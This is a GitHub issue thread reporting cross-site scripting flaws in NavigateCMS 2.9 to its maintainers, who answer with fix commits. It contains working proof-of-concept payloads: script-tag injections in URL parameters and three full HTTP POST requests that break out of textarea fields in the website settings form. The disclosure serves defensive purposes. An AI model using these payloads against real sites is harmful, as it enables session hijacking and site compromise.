### ISSUE TITLE
Cross Site Scripting Vulnerability funcition "fid" feature in NavigateCMS 2.9

### ISSUE THREAD

**Issue by Songohan22** [NavigateCMS/Navigate-CMS#21]
**Describe the bug**
An authenticated malicious user can take advantage of a Reflected XSS vulnerability on  funciton "fid" feature in NavigateCMS 2.9
**To Reproduce**

1. Log into the panel.
2. Go to "/navigate/navigate.php?fid=menus"
3. Insert payload URL:
           /navigate/navigate.php?fid=>"'><script>alert("SonGohan")<%2Fscript>
4. View the preview to trigger XSS.
5. View the preview to get in request and such  Reflected  XSS.

**Expected behavior**
The removal of script tags is not sufficient to prevent an XSS attack. You must HTML Entity encode any output that is stored back to the page.

**Impact**
Commonly include transmitting private data, like cookies or other session information, to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the user’s machine under the guise of the vulnerable site.

**Screenshots**
![image](https://user-images.githubusercontent.com/29293812/85265139-ff0a0a00-b49b-11ea-90f9-7881c61d9a44.png)
**Desktop (please complete the following information):**

- OS: Ubuntu
- Browser: Firefox
- Version: 76.0.1

**Comment by NavigateCMS** [comment]
Already fixed by d415db529acdf6a91eb7356e4d9c741d250c8225

**Comment by Songohan22** [comment]
Cross Site Scripting Vulnerability funcition "id, act" feature in NavigateCMS 2.9
+ /navigate/navigate.php??fid=blocks&act=edit&id=3"/><script>alert("SonGohan")</script>
+ /navigate/navigate.php??fid=blocks&act=edit"/><script>alert("SonGohan")</script>&id=3

**Comment by NavigateCMS** [comment]
Both already fixed in version 2.9.1, check out the new version released today. Thank you Songohan22.

**Comment by Songohan22** [comment]
@NavigateCMS 
Nice...:D

**Comment by Songohan22** [comment]
Hi @NavigateCMS 

Cross Site Scripting Vulnerability funcition "tracking_script, mail_mailer[], language-variant-code[], language-locale[2], language-locale[1], language-id[2], language-id[1], file-name, comment_default_moderator, additional_styles, additional_scripts " feature in NavigateCMS 2.9

I think you fix it soon.

**Comment by NavigateCMS** [comment]
Can you provide an example for the fields additional_styles, additional_scripts and tracking_script? Thank you.

**Comment by Songohan22** [comment]
tracking_ script
Request:
POST /navigate/navigate.php?fid=websites&act=edit HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Referer: http://192.168.137.6:8765/navigate/navigate.php?fid=websites&act=edit
Cookie: navigate-tinymce-scroll=%7B%7D; PHPSESSID=r4pvjbe2eajff189vnug6ih0dl; NVSID_139cd01d0866df27=r4pvjbe2eajff189vnug6ih0dl; navigate-language=en
Connection: Keep-Alive
Host: 192.168.137.6:8765
X-Csrf-Token: cbc497d231626fdaf0f20f572629c51d95b330bd2feab29e1e8cae293b28f45f
Content-Length: 4481
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US
Content-Type: multipart/form-data; boundary=__AppScanBoundary__

--__AppScanBoundary__
Content-Disposition: form-data; name="form-sent"

true
--__AppScanBoundary__
Content-Disposition: form-data; name="_nv_csrf_token"

00bf0473071bad58ae4f739a3a78db9412fa1409c556f09e428d545d158d307d
--__AppScanBoundary__
Content-Disposition: form-data; name="id"


--__AppScanBoundary__
Content-Disposition: form-data; name="title"

1234
--__AppScanBoundary__
Content-Disposition: form-data; name="protocol"

https://
--__AppScanBoundary__
Content-Disposition: form-data; name="subdomain"

1234
--__AppScanBoundary__
Content-Disposition: form-data; name="domain"

1234
--__AppScanBoundary__
Content-Disposition: form-data; name="folder"

1234
--__AppScanBoundary__
Content-Disposition: form-data; name="homepage_from_structure"


--__AppScanBoundary__
Content-Disposition: form-data; name="homepage"

25
--__AppScanBoundary__
Content-Disposition: form-data; name="wrong_path_action"

http_404
--__AppScanBoundary__
Content-Disposition: form-data; name="wrong_path_redirect"


--__AppScanBoundary__
Content-Disposition: form-data; name="empty_path_action"

theme_404
--__AppScanBoundary__
Content-Disposition: form-data; name="permission"

1
--__AppScanBoundary__
Content-Disposition: form-data; name="redirect_to"

1234
--__AppScanBoundary__
Content-Disposition: form-data; name="languages-order"


--__AppScanBoundary__
Content-Disposition: form-data; name="language-id[1]"

en
--__AppScanBoundary__
Content-Disposition: form-data; name="language-code[]"

25
--__AppScanBoundary__
Content-Disposition: form-data; name="language-variant[]"

1
--__AppScanBoundary__
Content-Disposition: form-data; name="language-variant-code[]"

25
--__AppScanBoundary__
Content-Disposition: form-data; name="language-locale[1]"

ENU_USA
--__AppScanBoundary__
Content-Disposition: form-data; name="language-published[]"

1
--__AppScanBoundary__
Content-Disposition: form-data; name="date_format"

Y-m-d
--__AppScanBoundary__
Content-Disposition: form-data; name="default_timezone"

UTC
--__AppScanBoundary__
Content-Disposition: form-data; name="website-decimal_separator"

.
--__AppScanBoundary__
Content-Disposition: form-data; name="website-thousands_separator"

,
--__AppScanBoundary__
Content-Disposition: form-data; name="website-default_currency"

usd
--__AppScanBoundary__
Content-Disposition: form-data; name="website-default_size_unit"

mm
--__AppScanBoundary__
Content-Disposition: form-data; name="website-default_weight_unit"

kg
--__AppScanBoundary__
Content-Disposition: form-data; name="word_separator"

_
--__AppScanBoundary__
Content-Disposition: form-data; name="resize_uploaded_images"

1600
--__AppScanBoundary__
Content-Disposition: form-data; name="website-favicon"


--__AppScanBoundary__
Content-Disposition: form-data; name="share_files_media_browser"

1
--__AppScanBoundary__
Content-Disposition: form-data; name="comments_enabled_for"

1
--__AppScanBoundary__
Content-Disposition: form-data; name="comments_default_moderator"

c_author
--__AppScanBoundary__
Content-Disposition: form-data; name="page_cache"

1
--__AppScanBoundary__
Content-Disposition: form-data; name="mail_mailer[]"

smtp
--__AppScanBoundary__
Content-Disposition: form-data; name="mail_server"

test@altoromutual.com
--__AppScanBoundary__
Content-Disposition: form-data; name="mail_port"

test@altoromutual.com
--__AppScanBoundary__
Content-Disposition: form-data; name="mail_security"

1
--__AppScanBoundary__
Content-Disposition: form-data; name="mail_ignore_ssl_security"

1
--__AppScanBoundary__
Content-Disposition: form-data; name="mail_user"

test@altoromutual.com
--__AppScanBoundary__
Content-Disposition: form-data; name="mail_address"

753 Main Street
--__AppScanBoundary__
Content-Disposition: form-data; name="mail_password"

test@altoromutual.com
--__AppScanBoundary__
Content-Disposition: form-data; name="contact_emails"

test@altoromutual.com
--__AppScanBoundary__
Content-Disposition: form-data; name="website_additional_code[]"

tracking_scripts
--__AppScanBoundary__
Content-Disposition: form-data; name="tracking_scripts"

1234</textarea ><script>alert(18)</script>
--__AppScanBoundary__
Content-Disposition: form-data; name="additional_scripts"

1234
--__AppScanBoundary__
Content-Disposition: form-data; name="additional_styles"

1234
--__AppScanBoundary__--

**Comment by Songohan22** [comment]
additional_script
Request:
POST /navigate/navigate.php?fid=websites&act=edit HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Referer: http://192.168.137.6:8765/navigate/navigate.php?fid=websites&act=edit
Cookie: navigate-tinymce-scroll=%7B%7D; PHPSESSID=r4pvjbe2eajff189vnug6ih0dl; NVSID_139cd01d0866df27=r4pvjbe2eajff189vnug6ih0dl; navigate-language=en
Connection: Keep-Alive
Host: 192.168.137.6:8765
X-Csrf-Token: cbc497d231626fdaf0f20f572629c51d95b330bd2feab29e1e8cae293b28f45f
Content-Length: 4481
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US
Content-Type: multipart/form-data; boundary=__AppScanBoundary__

--__AppScanBoundary__
Content-Disposition: form-data; name="form-sent"

true
--__AppScanBoundary__
Content-Disposition: form-data; name="_nv_csrf_token"

00bf0473071bad58ae4f739a3a78db9412fa1409c556f09e428d545d158d307d
--__AppScanBoundary__
Content-Disposition: form-data; name="id"


--__AppScanBoundary__
Content-Disposition: form-data; name="title"

1234
--__AppScanBoundary__
Content-Disposition: form-data; name="protocol"

https://
--__AppScanBoundary__
Content-Disposition: form-data; name="subdomain"

1234
--__AppScanBoundary__
Content-Disposition: form-data; name="domain"

1234
--__AppScanBoundary__
Content-Disposition: form-data; name="folder"

1234
--__AppScanBoundary__
Content-Disposition: form-data; name="homepage_from_structure"


--__AppScanBoundary__
Content-Disposition: form-data; name="homepage"

25
--__AppScanBoundary__
Content-Disposition: form-data; name="wrong_path_action"

http_404
--__AppScanBoundary__
Content-Disposition: form-data; name="wrong_path_redirect"


--__AppScanBoundary__
Content-Disposition: form-data; name="empty_path_action"

theme_404
--__AppScanBoundary__
Content-Disposition: form-data; name="permission"

1
--__AppScanBoundary__
Content-Disposition: form-data; name="redirect_to"

1234
--__AppScanBoundary__
Content-Disposition: form-data; name="languages-order"


--__AppScanBoundary__
Content-Disposition: form-data; name="language-id[1]"

en
--__AppScanBoundary__
Content-Disposition: form-data; name="language-code[]"

25
--__AppScanBoundary__
Content-Disposition: form-data; name="language-variant[]"

1
--__AppScanBoundary__
Content-Disposition: form-data; name="language-variant-code[]"

25
--__AppScanBoundary__
Content-Disposition: form-data; name="language-locale[1]"

ENU_USA
--__AppScanBoundary__
Content-Disposition: form-data; name="language-published[]"

1
--__AppScanBoundary__
Content-Disposition: form-data; name="date_format"

Y-m-d
--__AppScanBoundary__
Content-Disposition: form-data; name="default_timezone"

UTC
--__AppScanBoundary__
Content-Disposition: form-data; name="website-decimal_separator"

.
--__AppScanBoundary__
Content-Disposition: form-data; name="website-thousands_separator"

,
--__AppScanBoundary__
Content-Disposition: form-data; name="website-default_currency"

usd
--__AppScanBoundary__
Content-Disposition: form-data; name="website-default_size_unit"

mm
--__AppScanBoundary__
Content-Disposition: form-data; name="website-default_weight_unit"

kg
--__AppScanBoundary__
Content-Disposition: form-data; name="word_separator"

_
--__AppScanBoundary__
Content-Disposition: form-data; name="resize_uploaded_images"

1600
--__AppScanBoundary__
Content-Disposition: form-data; name="website-favicon"


--__AppScanBoundary__
Content-Disposition: form-data; name="share_files_media_browser"

1
--__AppScanBoundary__
Content-Disposition: form-data; name="comments_enabled_for"

1
--__AppScanBoundary__
Content-Disposition: form-data; name="comments_default_moderator"

c_author
--__AppScanBoundary__
Content-Disposition: form-data; name="page_cache"

1
--__AppScanBoundary__
Content-Disposition: form-data; name="mail_mailer[]"

smtp
--__AppScanBoundary__
Content-Disposition: form-data; name="mail_server"

test@altoromutual.com
--__AppScanBoundary__
Content-Disposition: form-data; name="mail_port"

test@altoromutual.com
--__AppScanBoundary__
Content-Disposition: form-data; name="mail_security"

1
--__AppScanBoundary__
Content-Disposition: form-data; name="mail_ignore_ssl_security"

1
--__AppScanBoundary__
Content-Disposition: form-data; name="mail_user"

test@altoromutual.com
--__AppScanBoundary__
Content-Disposition: form-data; name="mail_address"

753 Main Street
--__AppScanBoundary__
Content-Disposition: form-data; name="mail_password"

test@altoromutual.com
--__AppScanBoundary__
Content-Disposition: form-data; name="contact_emails"

test@altoromutual.com
--__AppScanBoundary__
Content-Disposition: form-data; name="website_additional_code[]"

tracking_scripts
--__AppScanBoundary__
Content-Disposition: form-data; name="tracking_scripts"

1234
--__AppScanBoundary__
Content-Disposition: form-data; name="additional_scripts"

1234</textarea ><script>alert(15)</script>
--__AppScanBoundary__
Content-Disposition: form-data; name="additional_styles"

1234
--__AppScanBoundary__--

**Comment by Songohan22** [comment]
additional_styles
Request:
POST /navigate/navigate.php?fid=websites&act=edit HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Referer: http://192.168.137.6:8765/navigate/navigate.php?fid=websites&act=edit
Cookie: navigate-tinymce-scroll=%7B%7D; PHPSESSID=r4pvjbe2eajff189vnug6ih0dl; NVSID_139cd01d0866df27=r4pvjbe2eajff189vnug6ih0dl; navigate-language=en
Connection: Keep-Alive
Host: 192.168.137.6:8765
X-Csrf-Token: cbc497d231626fdaf0f20f572629c51d95b330bd2feab29e1e8cae293b28f45f
Content-Length: 4481
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US
Content-Type: multipart/form-data; boundary=


Content-Disposition: form-data; name="form-sent"

true

Content-Disposition: form-data; name="_nv_csrf_token"

00bf0473071bad58ae4f739a3a78db9412fa1409c556f09e428d545d158d307d

Content-Disposition: form-data; name="id"


Content-Disposition: form-data; name="title"

1234

Content-Disposition: form-data; name="protocol"

https://

Content-Disposition: form-data; name="subdomain"

1234

Content-Disposition: form-data; name="domain"

1234

Content-Disposition: form-data; name="folder"

1234

Content-Disposition: form-data; name="homepage_from_structure"



Content-Disposition: form-data; name="homepage"

25

Content-Disposition: form-data; name="wrong_path_action"

http_404

Content-Disposition: form-data; name="wrong_path_redirect"


Content-Disposition: form-data; name="empty_path_action"

theme_404

Content-Disposition: form-data; name="permission"

1

Content-Disposition: form-data; name="redirect_to"

1234

Content-Disposition: form-data; name="languages-order"



Content-Disposition: form-data; name="language-id[1]"

en

Content-Disposition: form-data; name="language-code[]"

25

Content-Disposition: form-data; name="language-variant[]"

1

Content-Disposition: form-data; name="language-variant-code[]"

25

Content-Disposition: form-data; name="language-locale[1]"

ENU_USA

Content-Disposition: form-data; name="language-published[]"

1

Content-Disposition: form-data; name="date_format"

Y-m-d

Content-Disposition: form-data; name="default_timezone"

UTC

Content-Disposition: form-data; name="website-decimal_separator"

.

Content-Disposition: form-data; name="website-thousands_separator"

,

Content-Disposition: form-data; name="website-default_currency"

usd

Content-Disposition: form-data; name="website-default_size_unit"

mm

Content-Disposition: form-data; name="website-default_weight_unit"

kg

Content-Disposition: form-data; name="word_separator"

_

Content-Disposition: form-data; name="resize_uploaded_images"

1600

Content-Disposition: form-data; name="website-favicon"



Content-Disposition: form-data; name="share_files_media_browser"

1

Content-Disposition: form-data; name="comments_enabled_for"

1

Content-Disposition: form-data; name="comments_default_moderator"

c_author

Content-Disposition: form-data; name="page_cache"

1

Content-Disposition: form-data; name="mail_mailer[]"

smtp

Content-Disposition: form-data; name="mail_server"

test@altoromutual.com

Content-Disposition: form-data; name="mail_port"

test@altoromutual.com

Content-Disposition: form-data; name="mail_security"

1

Content-Disposition: form-data; name="mail_ignore_ssl_security"

1

Content-Disposition: form-data; name="mail_user"

test@altoromutual.com

Content-Disposition: form-data; name="mail_address"

753 Main Street

Content-Disposition: form-data; name="mail_password"

test@altoromutual.com

Content-Disposition: form-data; name="contact_emails"

test@altoromutual.com

Content-Disposition: form-data; name="website_additional_code[]"

tracking_scripts

Content-Disposition: form-data; name="tracking_scripts"

1234

Content-Disposition: form-data; name="additional_scripts"

1234

Content-Disposition: form-data; name="additional_styles"

1234</textarea ><script>alert(20)</script>

**Comment by NavigateCMS** [comment]
Fixed by 33ef8dffad685576db3b31ae6afc83b619c918f8 and 652c55f6dd6aa23f71d7ef34ac59dbd6e4ebf765
